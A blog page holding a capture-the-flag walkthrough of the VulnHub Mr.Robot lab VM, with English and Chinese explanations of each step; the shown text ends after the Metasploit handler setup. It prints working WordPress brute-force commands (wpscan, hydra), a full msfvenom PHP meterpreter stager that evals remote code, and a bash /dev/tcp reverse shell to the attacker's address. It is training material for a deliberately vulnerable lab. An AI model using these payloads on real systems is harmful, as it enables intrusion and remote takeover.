<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">
<link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/safari_pinned_tab.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.31/dist/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/themes/blue/pace-theme-flash.css">
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"vkkkv.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":true,"version":"8.20.0","exturl":true,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":true,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="vulnhub mrRobotMr.Robot: a American television record the process of hacking vulnhubhttps:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;mr-robot-1,151&#x2F; use virtual box set network bridge network referencehttps:&#x2F;&#x2F;www.youtub">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub MrRobot">
<meta property="og:url" content="https://vkkkv.github.io/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/index.html">
<meta property="og:site_name" content="vkkkv&#39;s Blog">
<meta property="og:description" content="vulnhub mrRobotMr.Robot: a American television record the process of hacking vulnhubhttps:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;mr-robot-1,151&#x2F; use virtual box set network bridge network referencehttps:&#x2F;&#x2F;www.youtub">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-07-24T06:47:52.000Z">
<meta property="article:modified_time" content="2024-07-24T06:49:47.039Z">
<meta property="article:author" content="vkkkv">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="vulnhub">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://vkkkv.github.io/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://vkkkv.github.io/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/","path":"2024/07/24/CTFNoob/ctf2vulnhubMrRobot/","title":"vulnhub MrRobot"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>vulnhub MrRobot | vkkkv's Blog</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-2L68NKWCGZ"></script>
  <script class="next-config" data-name="google_analytics" type="application/json">{"tracking_id":"G-2L68NKWCGZ","only_pageview":false,"measure_protocol_api_secret":null}</script>
  <script src="/js/third-party/analytics/google-analytics.js"></script>








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">vkkkv's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">note and sharing</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#vulnhub-mrRobot"><span class="nav-number">1.</span> <span class="nav-text">vulnhub mrRobot</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#vulnhub"><span class="nav-number">1.1.</span> <span class="nav-text">vulnhub</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#reference"><span class="nav-number">1.2.</span> <span class="nav-text">reference</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#discover"><span class="nav-number">1.3.</span> <span class="nav-text">discover</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#netdiscover"><span class="nav-number">1.3.1.</span> <span class="nav-text">netdiscover</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#rustscan"><span class="nav-number">1.3.2.</span> <span class="nav-text">rustscan</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dic-bruteforce"><span class="nav-number">1.4.</span> <span class="nav-text">dic bruteforce</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#key-1-of-3-txt"><span class="nav-number">1.4.1.</span> <span class="nav-text">key-1-of-3.txt</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fsocity-dic"><span class="nav-number">1.4.2.</span> <span class="nav-text">fsocity.dic</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hash-crack"><span class="nav-number">1.4.3.</span> <span class="nav-text">hash crack</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sort"><span class="nav-number">1.4.4.</span> <span class="nav-text">sort</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#word-count"><span class="nav-number">1.4.5.</span> <span class="nav-text">word count</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#crack-password"><span class="nav-number">1.5.</span> <span class="nav-text">crack password</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#burpSuit"><span class="nav-number">1.5.1.</span> <span class="nav-text">burpSuit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wpscan"><span class="nav-number">1.5.2.</span> <span class="nav-text">wpscan</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hydra"><span class="nav-number">1.5.3.</span> <span class="nav-text">hydra</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#get-webshell"><span class="nav-number">1.6.</span> <span class="nav-text">get webshell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#msfvenom"><span class="nav-number">1.6.1.</span> <span class="nav-text">msfvenom</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#another-method"><span class="nav-number">1.7.</span> <span class="nav-text">another method</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#php-reverse-shell"><span class="nav-number">1.7.1.</span> <span class="nav-text">php-reverse-shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#msfconsole"><span class="nav-number">1.7.2.</span> <span class="nav-text">msfconsole</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#root-privilege"><span class="nav-number">1.8.</span> <span class="nav-text">root privilege</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#python"><span class="nav-number">1.8.1.</span> <span class="nav-text">python</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#suid"><span class="nav-number">1.8.2.</span> <span class="nav-text">suid</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-number">1.8.3.</span> <span class="nav-text">nmap</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="vkkkv"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">vkkkv</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL1ZLS0tW" title="github → https:&#x2F;&#x2F;github.com&#x2F;VKKKV"><i class="fab fa-github fa-fw"></i></span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="bWFpbHRvOmx1Y2FzYWN1bHp5QHlhaG9vLmNvbQ==" title="E-Mail → mailto:lucasaculzy@yahoo.com"><i class="fa fa-envelope fa-fw"></i></span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly90Lm1lLytoTDVmR0hiUmJFSmhZalJs" title="telegram → https:&#x2F;&#x2F;t.me&#x2F;+hL5fGHbRbEJhYjRl"><i class="fab fa-telegram fa-fw"></i></span>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <span class="exturl cc-opacity" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC8="><img src="https://cdn.jsdelivr.net/npm/@creativecommons/vocabulary@2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="Back to top">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://vkkkv.github.io/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="vkkkv">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="vkkkv's Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="vulnhub MrRobot | vkkkv's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vulnhub MrRobot
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2024-07-24 14:47:52 / Modified: 14:49:47" itemprop="dateCreated datePublished" datetime="2024-07-24T14:47:52+08:00">2024-07-24</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTFNoob/" itemprop="url" rel="index"><span itemprop="name">CTFNoob</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span></span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>NaN:aN</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="vulnhub-mrRobot"><a href="#vulnhub-mrRobot" class="headerlink" title="vulnhub mrRobot"></a>vulnhub mrRobot</h1><p>Mr.Robot: a American television</p>
<p>record the process of hacking</p>
<h2 id="vulnhub"><a href="#vulnhub" class="headerlink" title="vulnhub"></a>vulnhub</h2><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/mr-robot-1,151/">https://www.vulnhub.com/entry/mr-robot-1,151/</a></p>
<p>use virtual box</p>
<p>set network bridge network</p>
<h2 id="reference"><a href="#reference" class="headerlink" title="reference"></a>reference</h2><p><a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=Wa88lk5Jygk&list=PLElHR9MODvudCR4xh3dqtUxXFfhPx19fo&index=3">https://www.youtube.com/watch?v=Wa88lk5Jygk&amp;list=PLElHR9MODvudCR4xh3dqtUxXFfhPx19fo&amp;index=3</a></p>
<p><a target="_blank" rel="noopener" href="https://medium.com/geekculture/vulnhub-mr-robot-35eac3078d5c">https://medium.com/geekculture/vulnhub-mr-robot-35eac3078d5c</a></p>
<h2 id="discover"><a href="#discover" class="headerlink" title="discover"></a>discover</h2><h3 id="netdiscover"><a href="#netdiscover" class="headerlink" title="netdiscover"></a>netdiscover</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netdiscover -r 192.168.0.0/24</span><br></pre></td></tr></table></figure>

<ul>
<li><strong><code>-r 192.168.0.0/24</code></strong>: -r ip range目标网络地址范围。<code>192.168.0.0/24</code> 是一个 CIDR 表示法的网络地址，表示扫描 <code>192.168.0.0</code> 到 <code>192.168.0.0</code> 之间的所有 IP 地址。</li>
</ul>
<h3 id="rustscan"><a href="#rustscan" class="headerlink" title="rustscan"></a>rustscan</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rustscan -a 192.168.0.105</span><br></pre></td></tr></table></figure>

<ul>
<li><strong><code>-a 192.168.0.105</code></strong>: -a &#x3D;IP address。在这里，<code>192.168.0.105</code> 是目标主机的 IP 地址。</li>
</ul>
<h2 id="dic-bruteforce"><a href="#dic-bruteforce" class="headerlink" title="dic bruteforce"></a>dic bruteforce</h2><p>from robot.txt<br>get two file:</p>
<ul>
<li>fsocity.dic</li>
<li><code>flag</code>:key-1-of-3.txt</li>
</ul>
<h3 id="key-1-of-3-txt"><a href="#key-1-of-3-txt" class="headerlink" title="key-1-of-3.txt"></a>key-1-of-3.txt</h3><p>073403c8a58a1f80d943455fb30724b9</p>
<h3 id="fsocity-dic"><a href="#fsocity-dic" class="headerlink" title="fsocity.dic"></a>fsocity.dic</h3><p><a target="_blank" rel="noopener" href="http://192.168.0.105/fsocity.dic">http://192.168.0.105/fsocity.dic</a></p>
<h3 id="hash-crack"><a href="#hash-crack" class="headerlink" title="hash crack"></a>hash crack</h3><p><a target="_blank" rel="noopener" href="https://crackstation.net/">https://crackstation.net/</a></p>
<h3 id="sort"><a href="#sort" class="headerlink" title="sort"></a>sort</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sort -u fsocity.dic</span><br></pre></td></tr></table></figure>
<p>Sort and remove duplicates<br>删除重复项</p>
<h3 id="word-count"><a href="#word-count" class="headerlink" title="word count"></a>word count</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wc fsocity.dic</span><br></pre></td></tr></table></figure>
<h2 id="crack-password"><a href="#crack-password" class="headerlink" title="crack password"></a>crack password</h2><h3 id="burpSuit"><a href="#burpSuit" class="headerlink" title="burpSuit"></a>burpSuit</h3><p>OWASP ZAP is same as burpSuit</p>
<p>intruder</p>
<ul>
<li><strong>intruder</strong>: Burp Suite 的一个功能，用于进行暴力破解、模糊测试等攻击测试。<br>get username: elliot<br>get password: ER28-0652</li>
</ul>
<h3 id="wpscan"><a href="#wpscan" class="headerlink" title="wpscan"></a>wpscan</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://192.168.0.105/ --passwords dic.txt --usernames elliot</span><br></pre></td></tr></table></figure>

<p>get password</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[!] Valid Combinations Found:</span><br><span class="line"> | Username: elliot, Password: ER28-0652</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li><p><strong><code>--url http://192.168.0.105/</code></strong>: 指定要扫描的 WordPress 网站的 URL。在这里，<code>http://192.168.0.105/</code> 是目标网站的 URL。</p>
</li>
<li><p><strong><code>--enumerate u</code></strong>: 指定要扫描的内容。在这里，<code>u</code> 表示扫描用户名。</p>
</li>
<li><p><strong><code>--enumerate p </code></strong>: 指定要扫描的内容。在这里，<code>p</code> 表示扫描插件。</p>
</li>
<li><p><strong><code>--passwords dic.txt</code></strong>: 指定密码字典文件的路径和文件名。在这里，密码字典文件是 “dic.txt”，wpscan 将使用这个文件中的密码来尝试登录。</p>
</li>
<li><p><strong><code>--usernames elliot</code></strong>: 指定要尝试登录的用户名为 “elliot”。</p>
</li>
</ul>
<h3 id="hydra"><a href="#hydra" class="headerlink" title="hydra"></a>hydra</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -vV -l elliot -P robotdic.txt 192.168.0.105 http-post-form </span><br></pre></td></tr></table></figure>
<ol>
<li><p><strong>hydra</strong>: 这是密码破解工具 Hydra 的命令行程序。</p>
</li>
<li><p><strong>-vV</strong>: 这是 Hydra 的选项之一，用于显示详细信息。小写的 <code>-v</code> 表示详细输出，大写的 <code>-V</code> 表示显示每次尝试的结果。</p>
</li>
<li><p><strong>-l elliot</strong>: 这是指定要尝试登录的用户名为 “elliot”。</p>
</li>
<li><p><strong>-P robotdic.txt</strong>: 这是指定密码字典文件的路径和文件名。在这里，密码字典文件是 “robotdic.txt”，Hydra 将使用这个文件中的密码来尝试登录。</p>
</li>
<li><p><strong>192.168.0.105</strong>: 这是目标主机的IP地址，即要攻击的目标。</p>
</li>
<li><p><strong>http-post-form</strong>: 这是 Hydra 攻击的模块之一，指定使用 HTTP POST 表单进行攻击。</p>
</li>
</ol>
<h2 id="get-webshell"><a href="#get-webshell" class="headerlink" title="get webshell"></a>get webshell</h2><h3 id="msfvenom"><a href="#msfvenom" class="headerlink" title="msfvenom"></a>msfvenom</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4567 -f raw &gt; shell.php</span><br></pre></td></tr></table></figure>
<ul>
<li><p><strong><code>-p php/meterpreter/reverse_tcp</code></strong>: 指定要生成的 payload 类型。在这里，<code>php/meterpreter/reverse_tcp</code> 表示生成一个 PHP 脚本，该脚本会在目标主机上启动一个 meterpreter 会话，并通过 TCP 协议连接到指定的 IP 地址和端口。</p>
</li>
<li><p><code>-f</code> <strong>raw</strong>: 指定输出格式为 <code>raw</code> 格式，即原始的 payload 数据。</p>
</li>
<li><p><strong><code>LHOST=192.168.0.106</code></strong>: 指定 payload 连接的 IP 地址。在这里，<code>192.168.0.102</code> 是攻击者的 IP 地址。</p>
</li>
<li><p><strong><code>LPORT=4567</code></strong>: 指定 payload 连接的端口。在这里，<code>4567</code> 是攻击者监听的端口。</p>
</li>
</ul>
<p>get webshell<br>write shell.php to 404.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*&lt;?php /**/</span> <span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>); <span class="variable">$ip</span> = <span class="string">&#x27;192.168.0.106&#x27;</span>; <span class="variable">$port</span> = <span class="number">4567</span>; <span class="keyword">if</span> ((<span class="variable">$f</span> = <span class="string">&#x27;stream_socket_client&#x27;</span>) &amp;&amp; <span class="title function_ invoke__">is_callable</span>(<span class="variable">$f</span>)) &#123; <span class="variable">$s</span> = <span class="variable">$f</span>(<span class="string">&quot;tcp://<span class="subst">&#123;$ip&#125;</span>:<span class="subst">&#123;$port&#125;</span>&quot;</span>); <span class="variable">$s_type</span> = <span class="string">&#x27;stream&#x27;</span>; &#125; <span class="keyword">if</span> (!<span class="variable">$s</span> &amp;&amp; (<span class="variable">$f</span> = <span class="string">&#x27;fsockopen&#x27;</span>) &amp;&amp; <span class="title function_ invoke__">is_callable</span>(<span class="variable">$f</span>)) &#123; <span class="variable">$s</span> = <span class="variable">$f</span>(<span class="variable">$ip</span>, <span class="variable">$port</span>); <span class="variable">$s_type</span> = <span class="string">&#x27;stream&#x27;</span>; &#125; <span class="keyword">if</span> (!<span class="variable">$s</span> &amp;&amp; (<span class="variable">$f</span> = <span class="string">&#x27;socket_create&#x27;</span>) &amp;&amp; <span class="title function_ invoke__">is_callable</span>(<span class="variable">$f</span>)) &#123; <span class="variable">$s</span> = <span class="variable">$f</span>(AF_INET, SOCK_STREAM, SOL_TCP); <span class="variable">$res</span> = @<span class="title function_ invoke__">socket_connect</span>(<span class="variable">$s</span>, <span class="variable">$ip</span>, <span class="variable">$port</span>); <span class="keyword">if</span> (!<span class="variable">$res</span>) &#123; <span class="keyword">die</span>(); &#125; <span class="variable">$s_type</span> = <span class="string">&#x27;socket&#x27;</span>; &#125; <span class="keyword">if</span> (!<span class="variable">$s_type</span>) &#123; <span class="keyword">die</span>(<span class="string">&#x27;no socket funcs&#x27;</span>); &#125; <span class="keyword">if</span> (!<span class="variable">$s</span>) &#123; <span class="keyword">die</span>(<span class="string">&#x27;no socket&#x27;</span>); &#125; <span class="keyword">switch</span> (<span class="variable">$s_type</span>) &#123; <span class="keyword">case</span> <span class="string">&#x27;stream&#x27;</span>: <span class="variable">$len</span> = <span class="title function_ invoke__">fread</span>(<span class="variable">$s</span>, <span class="number">4</span>); <span class="keyword">break</span>; <span class="keyword">case</span> <span class="string">&#x27;socket&#x27;</span>: <span class="variable">$len</span> = <span class="title function_ invoke__">socket_read</span>(<span class="variable">$s</span>, <span class="number">4</span>); <span class="keyword">break</span>; &#125; <span class="keyword">if</span> (!<span class="variable">$len</span>) &#123; <span class="keyword">die</span>(); &#125; <span class="variable">$a</span> = <span class="title function_ invoke__">unpack</span>(<span class="string">&quot;Nlen&quot;</span>, <span class="variable">$len</span>); <span class="variable">$len</span> = <span class="variable">$a</span>[<span class="string">&#x27;len&#x27;</span>]; <span class="variable">$b</span> = <span class="string">&#x27;&#x27;</span>; <span class="keyword">while</span> (<span class="title function_ invoke__">strlen</span>(<span class="variable">$b</span>) &lt; <span class="variable">$len</span>) &#123; <span class="keyword">switch</span> (<span class="variable">$s_type</span>) &#123; <span class="keyword">case</span> <span class="string">&#x27;stream&#x27;</span>: <span class="variable">$b</span> .= <span class="title function_ invoke__">fread</span>(<span class="variable">$s</span>, <span class="variable">$len</span>-<span class="title function_ invoke__">strlen</span>(<span class="variable">$b</span>)); <span class="keyword">break</span>; <span class="keyword">case</span> <span class="string">&#x27;socket&#x27;</span>: <span class="variable">$b</span> .= <span class="title function_ invoke__">socket_read</span>(<span class="variable">$s</span>, <span class="variable">$len</span>-<span class="title function_ invoke__">strlen</span>(<span class="variable">$b</span>)); <span class="keyword">break</span>; &#125; &#125; <span class="variable">$GLOBALS</span>[<span class="string">&#x27;msgsock&#x27;</span>] = <span class="variable">$s</span>; <span class="variable">$GLOBALS</span>[<span class="string">&#x27;msgsock_type&#x27;</span>] = <span class="variable">$s_type</span>; <span class="keyword">if</span> (<span class="title function_ invoke__">extension_loaded</span>(<span class="string">&#x27;suhosin&#x27;</span>) &amp;&amp; <span class="title function_ invoke__">ini_get</span>(<span class="string">&#x27;suhosin.executor.disable_eval&#x27;</span>)) &#123; <span class="variable">$suhosin_bypass</span>=<span class="title function_ invoke__">create_function</span>(<span class="string">&#x27;&#x27;</span>, <span class="variable">$b</span>); <span class="variable">$suhosin_bypass</span>(); &#125; <span class="keyword">else</span> &#123; <span class="keyword">eval</span>(<span class="variable">$b</span>); &#125; <span class="keyword">die</span>();</span><br></pre></td></tr></table></figure>
<h2 id="another-method"><a href="#another-method" class="headerlink" title="another method"></a>another method</h2><h3 id="php-reverse-shell"><a href="#php-reverse-shell" class="headerlink" title="php-reverse-shell"></a>php-reverse-shell</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">exec</span>(<span class="string">&quot;/bin/bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.0.106/4567 0&gt;&amp;1&#x27;&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ol>
<li><p><strong>exec 函数</strong>: PHP 中的 exec 函数用于执行外部命令。在这里，exec 函数被用来执行一个命令字符串。</p>
</li>
<li><p><strong>命令字符串</strong>: <code>/bin/bash -c &#39;bash -i &gt;&amp; /dev/tcp/192.168.0.106/4567 0&gt;&amp;1&#39;</code></p>
</li>
</ol>
<ul>
<li>当 PHP 执行这段代码时，它会调用 <code>exec</code> 函数来执行指定的命令。</li>
<li>命令中的 <code>/bin/bash -c</code> 启动了一个 bash shell，并通过 <code>-i</code> 参数设置为交互模式。</li>
<li>接着，<code>&gt;&amp; /dev/tcp/192.168.0.106/4567</code> 将 bash 的标准输出和标准错误都重定向到指定的 IP 地址和端口号上，这里假设攻击者已经在远程主机上监听了 <code>4567</code> 端口。</li>
<li><code>0&gt;&amp;1</code> 则将标准输入也重定向到与标准输出相同的地方，这样就建立了一个完整的双向连接。</li>
</ul>
<h3 id="msfconsole"><a href="#msfconsole" class="headerlink" title="msfconsole"></a>msfconsole</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload php/meterpreter/reverse_tcp</span><br><span class="line">set LHOST 192.168.0.106</span><br><span class="line">set LPORT 4567</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>get</p>
